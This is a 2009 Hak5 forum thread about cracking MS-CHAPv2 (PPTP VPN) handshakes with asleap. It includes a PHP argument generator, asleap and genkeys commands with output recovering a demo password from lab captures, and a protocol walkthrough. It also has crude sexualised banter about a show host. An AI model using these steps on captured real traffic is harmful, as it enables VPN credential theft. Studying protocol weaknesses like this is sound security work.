Jump to content


Photo
- - - - -

Episode 6x12


  • Please log in to reply
22 replies to this topic

#1 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 04 November 2009 - 11:53 AM

Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.
Posted ImagePosted ImagePosted Image

#2 Iain

Iain

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 319 posts

Posted 04 November 2009 - 02:01 PM

QUOTE (Darren Kitchen @ Wed, 04 Nov 2009 21:53:03 +0000) <{POST_SNAPBACK}>
Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.

Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.

#3 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 04 November 2009 - 03:00 PM

QUOTE (Iain @ Wed, 04 Nov 2009 19:01:39 +0000) <{POST_SNAPBACK}>
Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.



I've uploaded one of my test packet captures to http://www.hak5.org/files/cap5.dump and the corresponding wordlist to http://www.hak5.org/files/wordlist.txt

The challenge is BEB90BD54A9D289758C9AE837944BC1B
The response is 725423423D1D0EB68B10DCB78743F97F0000000000000000

The username is "david" and the password is MurphyDade109 (If you check the wordlist you'll notice that before using Paul as a target I was going to go with characters from the movie Hackers.)

Feel free to have a go at it.

I did notice that if I told to RRAS server only to use CHAP instead of CHAPv2 I would get the expected 8 byte (16 chr) challenge, but the response would be all zeroes. Odd.

It kinda sucks that I wasn't able to produce a working demo but this happens from time to time and instead of scraping the segment all together (time constraints) I just made it work. Kinda. Anyway, hopefully someone else will have better luck and I hope to get this figured out soon.
Posted ImagePosted ImagePosted Image

#4 Iain

Iain

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 319 posts

Posted 04 November 2009 - 04:34 PM

My challenge for the weekend!

#5 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • PipPipPipPipPipPipPipPipPip
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 04 November 2009 - 05:52 PM

Pun intended?

I can't get it to work either. The challenge is too long for MS-Chap-v2, and for CHAP the response is just a bunch of zeroes.

(Why does ASLEAP compile under Backtrack 4 Pre-Final, but not under Ubuntu 9.04? Did I miss something?)
"Why is it 'marketing' when a company helps itself to my information against my will and 'piracy' or 'industrial espionage' if I helped myself to THEIR information against their will ?"

#6 Sc00bz

Sc00bz

    Hackling

  • Active Members
  • Pip
  • 15 posts
  • Gender:Male

Posted 04 November 2009 - 06:47 PM

Hmm I guess Darren doesn't read his email. Well here's what I emailed him.
CODE
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>asleap 2.2 Argument Generator</title>
<script type="text/javascript">
// <![CDATA[
// I so stole this function from phpBB
function selectCode()
{
   // Get ID of code block
   var e = document.getElementsByTagName('CODE')[0];

   // Not IE
   if (window.getSelection)
   {
      var s = window.getSelection();
      // Safari
      if (s.setBaseAndExtent)
      {
         s.setBaseAndExtent(e, 0, e, e.innerText.length - 1);
      }
      // Firefox and Opera
      else
      {
         var r = document.createRange();
         r.selectNodeContents(e);
         s.removeAllRanges();
         s.addRange(r);
      }
   }
   // Some older browsers
   else if (document.getSelection)
   {
      var s = document.getSelection();
      var r = document.createRange();
      r.selectNodeContents(e);
      s.removeAllRanges();
      s.addRange(r);
   }
   // IE
   else if (document.selection)
   {
      var r = document.body.createTextRange();
      r.moveToElementText(e);
      r.select();
   }
}
// ]]>
</script>
</head>
<body>
<div style="width:90%; margin:auto;">
<?php
if (isset($_GET['u'], $_GET['c'], $_GET['r']))
{
    $c = str_replace(':', '', $_GET['c']);
    $r = str_replace(':', '', $_GET['r']);
    $chapChallengeGood = preg_match("/^[0-9a-f]{32}$/i", $c);
    $chapResponseGood  = preg_match("/^[0-9a-f]{98}$/i", $r);
    if ($chapChallengeGood == 0)
    {
        echo 'Invalid CHAP Challenge.<br />';
    }
    if ($chapResponseGood == 0)
    {
        echo 'Invalid CHAP Response.<br />';
    }
    if ($chapChallengeGood && $chapResponseGood)
    {
        // **** This is the interesting part ****
        $userName = $_GET['u'];
        $authChallenge = pack('H*', $c);
        $peerChallenge = pack('H*', substr($r, 0, 32));
        $challenge = substr(sha1($peerChallenge . $authChallenge . $userName), 0, 16);
        $response = substr($r, 48, 48);
        $challenge = preg_replace("/([0-9a-f]{2})/i", '$1:', $challenge, 7);
        $response = preg_replace("/([0-9a-f]{2})/i", '$1:', $response, 23);
        // **** This is the interesting part ****
    }
}
?>
    <form method="get">
        User Name:<br />
        <input type="text" name="u" /><br />
        <br />
        "PPP CHAP Challenge" (16 bytes, 32 Hex characters):<br />
        <input type="text" name="c" size="45" /><br />
        <br />
        "PPP CHAP Response" (49 bytes, 98 Hex characters):<br />
        <input type="text" name="r" size="137" /><br />
        <input type="submit" value="Generate asleap arguments" />
    </form>
<?php
if (isset($challenge, $response))
{?>    <br />
    <a href="#" onclick="selectCode(); return false;">Select All</a><br />
    <div style="overflow:auto; width:100%;"><code style="white-space:pre;">./asleap -C <?php echo $challenge; ?> -R <?php echo $response; ?> -f words.dat -n words.idx</code></div>
<?php
}
?>
</div>
</body>
</html>

The PHP file will convert the CHAP challenge and response packet data into asleap arguments.

To copy the data from the packet right click on the value then "Copy" -> "Bytes (Hex Stream)" or "Copy" -> "Value" (if you have a newer version of Wireshark). "Copy" -> "Value" inserts the colons in between each byte which isn't necessary for the PHP file.

Your example in 6x12:
"CHAP Challenge": e1c0e8923252b20b5561ddf404310826
"CHAP Response": d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce12
67513fcf682b521800

"CHAP Challenge" packet is the "auth challenge" 16 byte value.
"CHAP Response" packet has the "peer challenge" 16 byte value and the peer response 24 byte value.

user name is paul
auth challenge is e1c0e8923252b20b5561ddf404310826
peer challenge is d4cfa66f00364d66fbf65f85de927930
peer response is 025b3bae30a50be25e47625c2d13ce1267513fcf682b5218
this gives you a challenge of 6a0062c675397a16
I do not know what the null characters are for, but they are probably just there for padding.

You should get this from the PHP file:
./asleap -C 6a:00:62:c6:75:39:7a:16 -R 02:5b:3b:ae:30:a5:0b:e2:5e:47:62:5c:2d:13:ce:12:67:51:3f:cf:68:2b:52:18 -f words.dat -n words.idx

When you run that with your word list it says:
CODE
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        ebcd
    Could not find a matching NT hash.  Try expanding your password list.
    I've given up.  Sorry it didn't work out.


sad.gif it found the hash bytes but the password seems to not be in the word list. Also you can't create a useful rainbow table for this since you only have 2 bytes of the hash.

-------------------

For the one posted above do the same thing.
user name is david
"CHAP Challenge" is e1c0e8923252b20b5561ddf404310826
"CHAP Response" is d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce12
67513fcf682b521800

This gives you:
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

Now run:
./genkeys -r wordlist.txt -f words.dat -n words.idx
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

And you'll get:
CODE
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        31cf
    NT hash:           5635283972918a8f9fb608418d9331cf
    password:          MurphyDade109


#7 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • PipPipPipPipPipPipPipPipPip
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 04 November 2009 - 08:43 PM

Nice.
"Why is it 'marketing' when a company helps itself to my information against my will and 'piracy' or 'industrial espionage' if I helped myself to THEIR information against their will ?"

#8 BuddhaChu

BuddhaChu

    Hak5 Fan

  • Active Members
  • PipPip
  • 28 posts

Posted 04 November 2009 - 11:00 PM

Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.

http://revision3.com...ead.php?t=31345

#9 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 05 November 2009 - 10:32 AM

QUOTE (Sc00bz @ Thu, 05 Nov 2009 00:47:17 +0000) <{POST_SNAPBACK}>
Hmm I guess Darren doesn't read his email.




I want to read it all, honestly I do. And I will, eventually. But I have a to-do list a mile long and all I can attack these buckets of email with is a soup spoon.

Anyway, thanks. I need to wrap my head around those functions. I knew it had something to do with the encoding. I'll be sure to highlight this in a coming episode. Probably not the very next since it'll be live at Va Tech.

QUOTE (BuddhaChu @ Thu, 05 Nov 2009 05:00:17 +0000) <{POST_SNAPBACK}>
Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.


There was an editing mistake that caused a re-render and re-release of the show. You may have caught a bad version. Is it still messed up?

(If you caught the show early and pay attention to the bear ad you'll see what I mean)
Posted ImagePosted ImagePosted Image

#10 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 05 November 2009 - 03:55 PM

Good episode!!!

Asleep is a good tool IF you can get it to work and you have all the info that you need to perform a successful attack and you have a dictionary large enough and tailored enough to make a successful go at it

I am just blown away that after weeks of throwing the request out........ Paul finally made it in front of the Camera and not only that we see him in his awesome party suit for the domain.com sponsor spot. That was worth the wait!!! as well as the look of pure horror on Jason's face when he opened the door to see Paul in the Pink Party Suit tongue.gif

Paul i am glad that they released you from your chains of bondage behind the camera i hope that this is going to be an ongoing trend and not just when Snubs and Matt abandon Darren for parts unknown. Stand up for your rights Camera guy and demand a segment of your own!!!

Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her smile.gif

Its great to see Hak5 back to real hacking again, brings a warm fuzzy to my old heart!
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard

#11 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • PipPipPipPipPipPipPipPipPip
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 05 November 2009 - 04:21 PM

QUOTE (Wetwork @ Fri, 06 Nov 2009 07:55:36 +0000) <{POST_SNAPBACK}>
Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her smile.gif

Where did you get that from?
"Why is it 'marketing' when a company helps itself to my information against my will and 'piracy' or 'industrial espionage' if I helped myself to THEIR information against their will ?"

#12 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 05 November 2009 - 04:58 PM

QUOTE (Psychosis @ Thu, 05 Nov 2009 16:21:28 +0000) <{POST_SNAPBACK}>
Where did you get that from?


Darren mentioned it when he was creating the list of Paul passwords for Asleep...Dont know if he was just "rolling" with it for the sake of the segment or if it was true...
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard

#13 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • PipPipPipPipPipPipPipPipPip
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 05 November 2009 - 05:45 PM

I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed of cupp.py, and that they had a son named Paul.
"Why is it 'marketing' when a company helps itself to my information against my will and 'piracy' or 'industrial espionage' if I helped myself to THEIR information against their will ?"

#14 Coreyja

Coreyja

    Hak5 Fan

  • Members
  • PipPip
  • 20 posts
  • Gender:Male
  • Location:80126

Posted 06 November 2009 - 04:08 AM

QUOTE (Wetwork @ Thu, 05 Nov 2009 14:55:36 +0000) <{POST_SNAPBACK}>
Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her smile.gif


I could be totally wrong on this so don't yell at me but aren't Snubs and Darren going out?






#15 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 06 November 2009 - 08:51 AM

QUOTE (Psychosis @ Thu, 05 Nov 2009 17:45:30 +0000) <{POST_SNAPBACK}>
I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed of cupp.py, and that they had a son named Paul.


Snubs you sexy minx, getting around arent you laugh.gif

Who ever Shannon is going out with he is a lucky guy
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard

#16 Jason Cooper

Jason Cooper

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 461 posts
  • Gender:Male
  • Location:Great Britain
  • Interests:Cards,
    Computers,
    Cryptography,
    Hacking,
    Lock Picking,
    Programming,
    And many more

Posted 06 November 2009 - 11:07 AM

QUOTE (Wetwork @ Thu, 05 Nov 2009 20:55:36 +0000) <{POST_SNAPBACK}>
Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her smile.gif


I was going to say something about it not being on 16yo Hak5 Fans but then realised I was starting to sound like a crazy stalker/ serial killer smile.gif

#17 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 06 November 2009 - 01:34 PM

QUOTE (scrapheap @ Fri, 06 Nov 2009 11:07:02 +0000) <{POST_SNAPBACK}>
I was going to say something about it not being on 16yo Hak5 Fans but then realised I was starting to sound like a crazy stalker/ serial killer smile.gif


Im sure that there are many Hak5 fans of all ages that are stripping there cable over Snubs, but in reality who could blame them she is a hottie
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard

#18 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 17 November 2009 - 06:04 PM

Comments from Sc00bz code:

CODE




"pack('H*', $str)" converts $str from a hex string to binary data. This is the opposite of the PHP function bin2hex(). I would love to just use hex2bin() but that function doesn't exist in PHP.

--------------------------

In MS-CHAPv2 (RFC 2759) the server sends a 16 byte authenticator challenge to the client and the client generates another 16 bytes of random data called the peer challenge. Using the peer challenge, authenticator challenge, and user name the client generates the 8 byte challenge. Then using the 8 byte challenge the client generates the response and sends the peer challenge and the response.

// Short version (just the 8 byte challenge generation):
// sha1() is the same one in PHP
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
// ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
challenge = substr(sha1BinaryData, 0, 8)
// ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)


You can stop here if you just want to know how the 8 byte challenge is generated.


// Long version (full MS-CHAPv2):
response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use

string /*24 bytes*/ MS_CHAPv2(string userName, string authenticatorChallenge /*16 bytes*/, string peerChallenge /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}

// sha1() is the same one in PHP
string sha1(string str[, bool raw_output = false])
{
// If the optional raw_output is set to TRUE, then
// the sha1 digest is instead returned in raw binary
// format with a length of 20, otherwise the returned
// value is a 40-character hexadecimal number.
}

string /*24 bytes*/ ChallengeResponse(string challenge /*8 bytes*/, string hash /*16 bytes*/)
{
hashPadded = hash . "\x00\x00\x00\x00\x00" // cat 5 null characters

response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
return response
}

string /*8 bytes*/ DesEncrypt(string message /*8 bytes*/, string key /*7 bytes*/)
{
// Encrypts message using key and returns cipher text (8 bytes).
}

-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
// { inside of MS_CHAPv2()
// sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true)
// // ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
// challenge = substr(sha1BinaryData, 0, 8)
// // ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)
// response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
// // { inside of ChallengeResponse()
// // hashPadded = ntlmHash . "\x00\x00\x00\x00\x00" // cat 5 null characters
// // // 8846f7eaee8fb117ad06bdd830b7586c0000000000
// //
// // response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
// // return response
// // // bc4acb4a3953680e = DesEncrypt(ab8031f17836bd56, 8846f7eaee8fb1)
// // // ... abd6fd979ad078aa .= DesEncrypt(ab8031f17836bd56, 17ad06bdd830b7)
// // // ... 5c21b44e13ea7df2 .= DesEncrypt(ab8031f17836bd56, 586c0000000000)
// // // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// // }
// return response
// // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// }
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use
// 706565725f6368616c6c656e67652e2e0000000000000000bc4acb4a3953680eabd6fd979ad078aa

--------------------------
--------------------------

Just for completeness here is MS-CHAPv1:
In MS-CHAPv1 (RFC 2433) the server sends the 8 byte challenge to the client and the client returns lmResponse and ntlmResponse. This is the same algorithm as NTLMv1 for SMB shared folders. Rainbow tables (halflmchall, lmchall, ntlmchall) can be made to attack this algorithm by spoofing a server with a constant challenge; most commonly the challenge is 1122334455667788.

response = MS_CHAPv1(challenge, lmHash, ntlmHash)
responsePacketValue = response .
"\x0?"; // "Use Windows NT compatible challenge response" flag

string /*48 bytes*/ MS_CHAPv1(string challenge /*8 bytes*/, string lmHash /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
response = ChallengeResponse(challenge, lmHash) // 24 bytes returned
response .= ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}
/* Quoted from RFC 2433:
The "use Windows NT compatible challenge response" flag, if 1,
indicates that the Windows NT response is provided and should be used
in preference to the LAN Manager response. The LAN Manager response
will still be used if the account does not have a Windows NT password
hash, e.g. if the password has not been changed since the account
was uploaded from a LAN Manager 2.x account database. If the flag is
0, the Windows NT response is ignored and the LAN Manager response is
used. Since the use of LAN Manager authentication has been
deprecated, this flag SHOULD always be set (1) and the LAN Manager
compatible challenge response field SHOULD be zero-filled.
*/

Posted ImagePosted ImagePosted Image

#19 someone

someone

    Newbie

  • Members
  • 3 posts

Posted 27 February 2010 - 06:43 AM

Could I get some help?

From wireshark you can get username, challenge and response, yes?
But using wireshark, is there a way to get peer response or challenge of? (Dont think so, cos of Darren post)
The reason why I ask, after using wireshark to capture the handshake, the using the following command, I get the following error:
CODE
# ./asleap -r /root/mine.dump -W /root/dics/common-1.txt
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "/root/dics/common-1.txt".
Unsupported pcap datalink type: (1)
Closing pcap ...

Any idea how I can get "peer response" or fix alseap problem?

Sc00bz, Thanks for the PHP code. But is it right that your paul and david 'sCHAP Challenge, CHAP Response is the same? Just the username are different?

Anywyay - Ive made up this table, I hope to clean things up....

The "paul" example:
CODE
Username        : paul

challenge       : e1c0e8923252b20b5561ddf404310826
response        : d4cfa66f00364d66fbf65f85de9279300000000000000000...
response(CUT)   : d4cfa66f00364d66fbf65f85de927930

peer response   : 025b3bae30a50be25e47625c2d13ce1267513fcf682b5218
challenge of    : 6a0062c675397a16
hash bytes:     : ???

CHAP Challenge  : e1c0e8923252b20b5561ddf404310826
CHAP Response   : d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce12
67513fcf682b521800


The "david" example:
CODE
username        : david

auth challenge  : BEB90BD54A9D289758C9AE837944BC1B
peer challenge  : 725423423D1D0EB68B10DCB78743F97F
peer challenge  : 725423423D1D0EB68B10DCB78743F97F0000000000000000...

peer response   : ???
challenge of    : ???
hash bytes:     : ???

CHAP Challenge  : BEB90BD54A9D289758C9AE837944BC1B
CHAP Response   : ???


The "data/pptp.dump" example
CODE
username        : scott

challenge       : E3A5D0775370BDA51E16219A06B0278F
response(CUT)   : 84C4B33E00D9231645598ACF91C38480
response        : 84C4B33E00D9231645598ACF91C384800000000000000000......

peer response   : 565fe2492fd5fb88edaec934c00d282c046227406c31609b
challenge of    : 7c00a1a403ca7df5
hash bytes:     : 816b

CHAP Challenge  : E3A5D0775370BDA51E16219A06B0278F
CHAP Response   : 84C4B33E00D9231645598ACF91C384800000000000000000565fe2492fd5fb88edaec934c00d282c
046227406c31609b00


#20 leroy

leroy

    Newbie

  • Members
  • 3 posts

Posted 14 March 2010 - 08:32 AM

Darren thanks for this very interesting information. But I didn´t get i going anyhow. I twould be so awesome to see this hack working in real life!

I researched the net and didn´t find any useful hint that we could get this going with asleap.

None of the well known forums has a proof of concept for it - so who is going to be first?






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users